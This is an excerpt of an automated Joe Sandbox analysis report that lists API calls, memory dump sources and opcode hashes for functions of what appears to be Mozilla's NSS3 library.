                                                                                                                                                                                                                                                                                                                        • Part of subcall function 6CF0C2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6CF0C2BF
                                                                                                                                                                                                                                                                                                                      • PR_EnterMonitor.NSS3(?), ref: 6CEE0004
                                                                                                                                                                                                                                                                                                                      • PR_EnterMonitor.NSS3(?), ref: 6CEE001B
                                                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                                                      • Source File: 00000002.00000002.1864410556.000000006CDE1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CDE0000, based on PE: true
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1864270690.000000006CDE0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865248315.000000006CF7F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865651933.000000006CFBE000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865764551.000000006CFBF000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865853565.000000006CFC0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865945305.000000006CFC5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_6cde0000_file.jbxd
                                                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                                                      • API ID: EnterMonitor$ErrorValue
                                                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                                                      • API String ID: 3413098822-0
                                                                                                                                                                                                                                                                                                                      • Opcode ID: ae6b5bbcffa27ac59f079396dc0897b412ce9729b93ddf9c0004c14ec18d19ca
                                                                                                                                                                                                                                                                                                                      • Instruction ID: 3937734d96fa247199462fbffd86d8e5033ddd8be9e987c3802ba0142c2e35b5
                                                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: ae6b5bbcffa27ac59f079396dc0897b412ce9729b93ddf9c0004c14ec18d19ca
                                                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: A1414C766446808BE7208A28EC517AB73B1DB4638CF74093DD447CEF90EF79A54AE742
                                                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                                                      • PK11_Authenticate.NSS3(?,00000001,00000004), ref: 6CE9EF38
                                                                                                                                                                                                                                                                                                                        • Part of subcall function 6CE89520: PK11_IsLoggedIn.NSS3(00000000,?,6CEB379E,?,00000001,?), ref: 6CE89542
                                                                                                                                                                                                                                                                                                                      • PK11_Authenticate.NSS3(?,00000001,?), ref: 6CE9EF53
                                                                                                                                                                                                                                                                                                                        • Part of subcall function 6CEA4C20: TlsGetValue.KERNEL32 ref: 6CEA4C4C
                                                                                                                                                                                                                                                                                                                        • Part of subcall function 6CEA4C20: EnterCriticalSection.KERNEL32(?), ref: 6CEA4C60
                                                                                                                                                                                                                                                                                                                        • Part of subcall function 6CEA4C20: PR_Unlock.NSS3(?,?,?,?,?,?,?,?,?,?,?), ref: 6CEA4CA1
                                                                                                                                                                                                                                                                                                                        • Part of subcall function 6CEA4C20: TlsGetValue.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 6CEA4CBE
                                                                                                                                                                                                                                                                                                                        • Part of subcall function 6CEA4C20: EnterCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,?), ref: 6CEA4CD2
                                                                                                                                                                                                                                                                                                                        • Part of subcall function 6CEA4C20: realloc.MOZGLUE(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6CEA4D3A
                                                                                                                                                                                                                                                                                                                      • PR_GetCurrentThread.NSS3 ref: 6CE9EF9E
                                                                                                                                                                                                                                                                                                                        • Part of subcall function 6CF29BF0: TlsGetValue.KERNEL32(?,?,?,6CF70A75), ref: 6CF29C07
                                                                                                                                                                                                                                                                                                                      • free.MOZGLUE(00000000), ref: 6CE9EFC3
                                                                                                                                                                                                                                                                                                                      • PR_SetError.NSS3(FFFFE001,00000000), ref: 6CE9F016
                                                                                                                                                                                                                                                                                                                      • free.MOZGLUE(00000000), ref: 6CE9F022
                                                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                                                      • Source File: 00000002.00000002.1864410556.000000006CDE1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CDE0000, based on PE: true
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1864270690.000000006CDE0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865248315.000000006CF7F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865651933.000000006CFBE000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865764551.000000006CFBF000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865853565.000000006CFC0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865945305.000000006CFC5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_6cde0000_file.jbxd
                                                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                                                      • API ID: K11_Value$AuthenticateCriticalEnterSectionfree$CurrentErrorLoggedThreadUnlockrealloc
                                                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                                                      • API String ID: 2459274275-0
                                                                                                                                                                                                                                                                                                                      • Opcode ID: e667bc95725fbb5acfb94a88e96552f5df583691acd669b546c6898284832b0d
                                                                                                                                                                                                                                                                                                                      • Instruction ID: be4abc5cbf7241d2db15bb4c3d3b27b40a3e3718104f86b8b6a5943010c06590
                                                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: e667bc95725fbb5acfb94a88e96552f5df583691acd669b546c6898284832b0d
                                                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 62419271E00209AFDF018FA9DC85BEE7BB9EF48358F144029F915A7350EB75C9158BA1
                                                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                                                      • PORT_Alloc_Util.NSS3(00000060), ref: 6CE8CF80
                                                                                                                                                                                                                                                                                                                      • SECITEM_DupItem_Util.NSS3(?), ref: 6CE8D002
                                                                                                                                                                                                                                                                                                                      • PR_SetError.NSS3(FFFFE005,00000000,00000000,00000000,?,00000000), ref: 6CE8D016
                                                                                                                                                                                                                                                                                                                      • PR_SetError.NSS3(FFFFE005,00000000), ref: 6CE8D025
                                                                                                                                                                                                                                                                                                                      • PR_NewLock.NSS3 ref: 6CE8D043
                                                                                                                                                                                                                                                                                                                      • PK11_DestroyContext.NSS3(00000000,00000001), ref: 6CE8D074
                                                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                                                      • Source File: 00000002.00000002.1864410556.000000006CDE1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CDE0000, based on PE: true
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1864270690.000000006CDE0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865248315.000000006CF7F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865651933.000000006CFBE000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865764551.000000006CFBF000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865853565.000000006CFC0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865945305.000000006CFC5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_6cde0000_file.jbxd
                                                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                                                      • API ID: ErrorUtil$Alloc_ContextDestroyItem_K11_Lock
                                                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                                                      • API String ID: 3361105336-0
                                                                                                                                                                                                                                                                                                                      • Opcode ID: 8c6a04205297a77eeda2ac914abfb2b234ccef624f6d098e1aecd47b1f15d3fd
                                                                                                                                                                                                                                                                                                                      • Instruction ID: 6859e4b3e2943ea79d8ede88c1df7a3e0c0430f1bf3e5a0277640d2f4a97401d
                                                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 8c6a04205297a77eeda2ac914abfb2b234ccef624f6d098e1aecd47b1f15d3fd
                                                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 9241B4B4A022168FEB10DF69C8807967BF5EF0531CF20416ADC1D8B746D775D585CBA2
                                                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                                                      • PORT_ArenaMark_Util.NSS3(?), ref: 6CED3FF2
                                                                                                                                                                                                                                                                                                                        • Part of subcall function 6CEC14C0: TlsGetValue.KERNEL32 ref: 6CEC14E0
                                                                                                                                                                                                                                                                                                                        • Part of subcall function 6CEC14C0: EnterCriticalSection.KERNEL32 ref: 6CEC14F5
                                                                                                                                                                                                                                                                                                                        • Part of subcall function 6CEC14C0: PR_Unlock.NSS3 ref: 6CEC150D
                                                                                                                                                                                                                                                                                                                      • PORT_ArenaMark_Util.NSS3(?), ref: 6CED4001
                                                                                                                                                                                                                                                                                                                      • PORT_ArenaAlloc_Util.NSS3(?,00000074), ref: 6CED400F
                                                                                                                                                                                                                                                                                                                        • Part of subcall function 6CEC10C0: TlsGetValue.KERNEL32(?,6CE68802,00000000,00000008,?,6CE5EF74,00000000), ref: 6CEC10F3
                                                                                                                                                                                                                                                                                                                        • Part of subcall function 6CEC10C0: EnterCriticalSection.KERNEL32(?,?,6CE68802,00000000,00000008,?,6CE5EF74,00000000), ref: 6CEC110C
                                                                                                                                                                                                                                                                                                                        • Part of subcall function 6CEC10C0: PL_ArenaAllocate.NSS3(?,?,?,6CE68802,00000000,00000008,?,6CE5EF74,00000000), ref: 6CEC1141
                                                                                                                                                                                                                                                                                                                        • Part of subcall function 6CEC10C0: PR_Unlock.NSS3(?,?,?,6CE68802,00000000,00000008,?,6CE5EF74,00000000), ref: 6CEC1182
                                                                                                                                                                                                                                                                                                                        • Part of subcall function 6CEC10C0: TlsGetValue.KERNEL32(?,6CE68802,00000000,00000008,?,6CE5EF74,00000000), ref: 6CEC119C
                                                                                                                                                                                                                                                                                                                      • CERT_CertChainFromCert.NSS3(?,00000004,00000000), ref: 6CED4054
                                                                                                                                                                                                                                                                                                                        • Part of subcall function 6CE6BB90: PORT_NewArena_Util.NSS3(00001000), ref: 6CE6BC24
                                                                                                                                                                                                                                                                                                                        • Part of subcall function 6CE6BB90: PORT_ArenaAlloc_Util.NSS3(00000000,0000000C), ref: 6CE6BC39
                                                                                                                                                                                                                                                                                                                        • Part of subcall function 6CE6BB90: PORT_ArenaAlloc_Util.NSS3(00000000), ref: 6CE6BC58
                                                                                                                                                                                                                                                                                                                        • Part of subcall function 6CE6BB90: SECITEM_CopyItem_Util.NSS3(?,?,00000000), ref: 6CE6BCBE
                                                                                                                                                                                                                                                                                                                      • PR_SetError.NSS3(FFFFE005,00000000), ref: 6CED4070
                                                                                                                                                                                                                                                                                                                      • NSS_CMSSignedData_Destroy.NSS3(00000000), ref: 6CED40CD
                                                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                                                      • Source File: 00000002.00000002.1864410556.000000006CDE1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CDE0000, based on PE: true
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1864270690.000000006CDE0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865248315.000000006CF7F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865651933.000000006CFBE000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865764551.000000006CFBF000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865853565.000000006CFC0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865945305.000000006CFC5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_6cde0000_file.jbxd
                                                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                                                      • API ID: Util$Arena$Alloc_Value$CertCriticalEnterMark_SectionUnlock$AllocateArena_ChainCopyData_DestroyErrorFromItem_Signed
                                                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                                                      • API String ID: 3882640887-0
                                                                                                                                                                                                                                                                                                                      • Opcode ID: 8565db44def4394cf1c4ce5b1bb8f6a2474b8ca5098013b0b962094d5317ff05
                                                                                                                                                                                                                                                                                                                      • Instruction ID: 1108aa9313d8e9b8ffc796333e85ead54e19e63664cbf26bbb4b51389bb102d6
                                                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 8565db44def4394cf1c4ce5b1bb8f6a2474b8ca5098013b0b962094d5317ff05
                                                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 1C31F872E0034197EB009F649D41BBB3374AFA170CF254229ED189B742F771F95A8293
                                                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                                                      • SECOID_FindOID_Util.NSS3(?,00000000,00000001,00000000,?,?,6CE62D1A), ref: 6CE72E7E
                                                                                                                                                                                                                                                                                                                        • Part of subcall function 6CEC07B0: PL_HashTableLookupConst.NSS3(?,FFFFFFFF,?,?,6CE68298,?,?,?,6CE5FCE5,?), ref: 6CEC07BF
                                                                                                                                                                                                                                                                                                                        • Part of subcall function 6CEC07B0: PL_HashTableLookup.NSS3(?,?), ref: 6CEC07E6
                                                                                                                                                                                                                                                                                                                        • Part of subcall function 6CEC07B0: PR_SetError.NSS3(FFFFE08F,00000000), ref: 6CEC081B
                                                                                                                                                                                                                                                                                                                        • Part of subcall function 6CEC07B0: PR_SetError.NSS3(FFFFE08F,00000000), ref: 6CEC0825
                                                                                                                                                                                                                                                                                                                      • PR_Now.NSS3 ref: 6CE72EDF
                                                                                                                                                                                                                                                                                                                      • CERT_FindCertIssuer.NSS3(?,00000000,?,0000000B), ref: 6CE72EE9
                                                                                                                                                                                                                                                                                                                      • SECOID_FindOID_Util.NSS3(-000000D8,?,?,?,?,6CE62D1A), ref: 6CE72F01
                                                                                                                                                                                                                                                                                                                      • CERT_DestroyCertificate.NSS3(?,?,?,?,?,?,6CE62D1A), ref: 6CE72F50
                                                                                                                                                                                                                                                                                                                      • SECITEM_CopyItem_Util.NSS3(?,?,?), ref: 6CE72F81
                                                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                                                      • Source File: 00000002.00000002.1864410556.000000006CDE1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CDE0000, based on PE: true
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1864270690.000000006CDE0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865248315.000000006CF7F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865651933.000000006CFBE000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865764551.000000006CFBF000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865853565.000000006CFC0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865945305.000000006CFC5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_6cde0000_file.jbxd
                                                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                                                      • API ID: FindUtil$ErrorHashLookupTable$CertCertificateConstCopyDestroyIssuerItem_
                                                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                                                      • API String ID: 287051776-0
                                                                                                                                                                                                                                                                                                                      • Opcode ID: 6b467407cb95a1ae026b0ee79dd1b2f7e38d058143e2b848c32e4eb652019a89
                                                                                                                                                                                                                                                                                                                      • Instruction ID: a8006bac84b1e777c0797bc5841a4d9b6dd45ac745351efc38ef05937ddd1c46
                                                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 6b467407cb95a1ae026b0ee79dd1b2f7e38d058143e2b848c32e4eb652019a89
                                                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: DE312571901100C7E738C666CC4ABAEB276EFA131CF74457AD429A7BD0EB359886C732
                                                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                                                      • CERT_DecodeAVAValue.NSS3(?,?,6CE60A2C), ref: 6CE60E0F
                                                                                                                                                                                                                                                                                                                      • PORT_ArenaAlloc_Util.NSS3(?,00000001,?,?,6CE60A2C), ref: 6CE60E73
                                                                                                                                                                                                                                                                                                                      • memset.VCRUNTIME140(00000000,00000000,00000001,?,?,?,?,6CE60A2C), ref: 6CE60E85
                                                                                                                                                                                                                                                                                                                      • PORT_ZAlloc_Util.NSS3(00000001,?,?,6CE60A2C), ref: 6CE60E90
                                                                                                                                                                                                                                                                                                                      • free.MOZGLUE(00000000), ref: 6CE60EC4
                                                                                                                                                                                                                                                                                                                      • SECITEM_ZfreeItem_Util.NSS3(?,00000001,?,?,?,6CE60A2C), ref: 6CE60ED9
                                                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                                                      • Source File: 00000002.00000002.1864410556.000000006CDE1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CDE0000, based on PE: true
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1864270690.000000006CDE0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865248315.000000006CF7F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865651933.000000006CFBE000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865764551.000000006CFBF000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865853565.000000006CFC0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865945305.000000006CFC5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_6cde0000_file.jbxd
                                                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                                                      • API ID: Util$Alloc_$ArenaDecodeItem_ValueZfreefreememset
                                                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                                                      • API String ID: 3618544408-0
                                                                                                                                                                                                                                                                                                                      • Opcode ID: 1dc5d8079c39cf22df11462fa0092fe8307821f8c983dd027c0f41c221e61a86
                                                                                                                                                                                                                                                                                                                      • Instruction ID: b5f852a1adfc6cfbfd94c65cba0bac63d52dca85bc80e1dfd23a7214ca8a389a
                                                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 1dc5d8079c39cf22df11462fa0092fe8307821f8c983dd027c0f41c221e61a86
                                                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 28214E72FE02B44BEF1049679C81B6B76BEDBC274CF350035D81963F42EA61C81582A6
                                                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                                                      • PORT_NewArena_Util.NSS3(00000800), ref: 6CE6AEB3
                                                                                                                                                                                                                                                                                                                      • SEC_ASN1EncodeUnsignedInteger_Util.NSS3(00000000,?,00000000), ref: 6CE6AECA
                                                                                                                                                                                                                                                                                                                      • PR_SetError.NSS3(FFFFE013,00000000), ref: 6CE6AEDD
                                                                                                                                                                                                                                                                                                                      • PR_SetError.NSS3(FFFFE022,00000000), ref: 6CE6AF02
                                                                                                                                                                                                                                                                                                                      • SEC_ASN1EncodeItem_Util.NSS3(?,?,?,6CF89500), ref: 6CE6AF23
                                                                                                                                                                                                                                                                                                                        • Part of subcall function 6CEBF080: PORT_FreeArena_Util.NSS3(00000000,00000000,?,?,?,?,?,?,?,?,?), ref: 6CEBF0C8
                                                                                                                                                                                                                                                                                                                        • Part of subcall function 6CEBF080: PORT_FreeArena_Util.NSS3(00000000,00000000), ref: 6CEBF122
                                                                                                                                                                                                                                                                                                                      • PORT_FreeArena_Util.NSS3(00000000,00000000), ref: 6CE6AF37
                                                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                                                      • Source File: 00000002.00000002.1864410556.000000006CDE1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CDE0000, based on PE: true
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1864270690.000000006CDE0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865248315.000000006CF7F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865651933.000000006CFBE000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865764551.000000006CFBF000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865853565.000000006CFC0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865945305.000000006CFC5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_6cde0000_file.jbxd
                                                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                                                      • API ID: Util$Arena_$Free$EncodeError$Integer_Item_Unsigned
                                                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                                                      • API String ID: 3714604333-0
                                                                                                                                                                                                                                                                                                                      • Opcode ID: 10a0d2ff2b753316d81c29d2c4fb784e3601227e63f48e621b1875d14a7f2625
                                                                                                                                                                                                                                                                                                                      • Instruction ID: 2a476b0d4acfabdd8d66b803989fb39a4168209b75b77f407b2736d49be1b3f9
                                                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 10a0d2ff2b753316d81c29d2c4fb784e3601227e63f48e621b1875d14a7f2625
                                                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 3B215AB5E952105BEB008F19CC02B9A7BF4AF8572CF244318FC249BB80E731D94587A3
                                                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                                                      • PR_SetError.NSS3(FFFFE013,00000000), ref: 6CEEEE85
                                                                                                                                                                                                                                                                                                                      • realloc.MOZGLUE(9543BF6C,?), ref: 6CEEEEAE
                                                                                                                                                                                                                                                                                                                      • PORT_Alloc_Util.NSS3(?), ref: 6CEEEEC5
                                                                                                                                                                                                                                                                                                                        • Part of subcall function 6CEC0BE0: malloc.MOZGLUE(6CEB8D2D,?,00000000,?), ref: 6CEC0BF8
                                                                                                                                                                                                                                                                                                                        • Part of subcall function 6CEC0BE0: TlsGetValue.KERNEL32(6CEB8D2D,?,00000000,?), ref: 6CEC0C15
                                                                                                                                                                                                                                                                                                                      • htonl.WSOCK32(?), ref: 6CEEEEE3
                                                                                                                                                                                                                                                                                                                      • htonl.WSOCK32(00000000,?), ref: 6CEEEEED
                                                                                                                                                                                                                                                                                                                      • memcpy.VCRUNTIME140(?,?,?,00000000,?), ref: 6CEEEF01
                                                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                                                      • Source File: 00000002.00000002.1864410556.000000006CDE1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CDE0000, based on PE: true
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1864270690.000000006CDE0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865248315.000000006CF7F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865651933.000000006CFBE000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865764551.000000006CFBF000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865853565.000000006CFC0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865945305.000000006CFC5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_6cde0000_file.jbxd
                                                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                                                      • API ID: htonl$Alloc_ErrorUtilValuemallocmemcpyrealloc
                                                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                                                      • API String ID: 1351805024-0
                                                                                                                                                                                                                                                                                                                      • Opcode ID: 1490e9e0c3bf984c9800f2a8b2a84b14ff3c48e3effa3454eb18202d90a220f4
                                                                                                                                                                                                                                                                                                                      • Instruction ID: 18733566686545854a56e6b66240079129c1134502477ea40aae30bd9a3da486
                                                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 1490e9e0c3bf984c9800f2a8b2a84b14ff3c48e3effa3454eb18202d90a220f4
                                                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 7821E571A006149FCB109F28DC81B9AB7B4EF49398F258169EC199B751E330EC14CBE6
                                                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                                                      • PORT_NewArena_Util.NSS3(00000800), ref: 6CE67F68
                                                                                                                                                                                                                                                                                                                        • Part of subcall function 6CEC0FF0: calloc.MOZGLUE(00000001,00000024,00000000,?,?,6CE687ED,00000800,6CE5EF74,00000000), ref: 6CEC1000
                                                                                                                                                                                                                                                                                                                        • Part of subcall function 6CEC0FF0: PR_NewLock.NSS3(?,00000800,6CE5EF74,00000000), ref: 6CEC1016
                                                                                                                                                                                                                                                                                                                        • Part of subcall function 6CEC0FF0: PL_InitArenaPool.NSS3(00000000,security,6CE687ED,00000008,?,00000800,6CE5EF74,00000000), ref: 6CEC102B
                                                                                                                                                                                                                                                                                                                      • PORT_ArenaAlloc_Util.NSS3(00000000,0000002C), ref: 6CE67F7B
                                                                                                                                                                                                                                                                                                                        • Part of subcall function 6CEC10C0: TlsGetValue.KERNEL32(?,6CE68802,00000000,00000008,?,6CE5EF74,00000000), ref: 6CEC10F3
                                                                                                                                                                                                                                                                                                                        • Part of subcall function 6CEC10C0: EnterCriticalSection.KERNEL32(?,?,6CE68802,00000000,00000008,?,6CE5EF74,00000000), ref: 6CEC110C
                                                                                                                                                                                                                                                                                                                        • Part of subcall function 6CEC10C0: PL_ArenaAllocate.NSS3(?,?,?,6CE68802,00000000,00000008,?,6CE5EF74,00000000), ref: 6CEC1141
                                                                                                                                                                                                                                                                                                                        • Part of subcall function 6CEC10C0: PR_Unlock.NSS3(?,?,?,6CE68802,00000000,00000008,?,6CE5EF74,00000000), ref: 6CEC1182
                                                                                                                                                                                                                                                                                                                        • Part of subcall function 6CEC10C0: TlsGetValue.KERNEL32(?,6CE68802,00000000,00000008,?,6CE5EF74,00000000), ref: 6CEC119C
                                                                                                                                                                                                                                                                                                                      • SECITEM_CopyItem_Util.NSS3(00000000,?,?), ref: 6CE67FA7
                                                                                                                                                                                                                                                                                                                        • Part of subcall function 6CEBFB60: PORT_ArenaAlloc_Util.NSS3(00000000,E0056800,00000000,?,?,6CEB8D2D,?,00000000,?), ref: 6CEBFB85
                                                                                                                                                                                                                                                                                                                        • Part of subcall function 6CEBFB60: memcpy.VCRUNTIME140(00000000,6A1BEBC6,E0056800,?), ref: 6CEBFBB1
